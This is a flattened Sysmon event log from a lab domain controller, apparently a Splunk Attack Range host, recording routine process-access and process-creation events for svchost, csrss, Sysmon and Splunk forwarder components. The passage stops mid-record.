13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9054-6005-1501-00000000A301}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9054-6005-1501-00000000A301}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.692{59A5CD1D-9054-6005-1501-00000000A301}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.519{59A5CD1D-9055-6005-1601-00000000A301}4380804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9055-6005-1601-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9055-6005-1601-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9055-6005-1601-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:45.379{59A5CD1D-9055-6005-1601-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:46.051{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9056-6005-1701-00000000A301}4344C:\Program 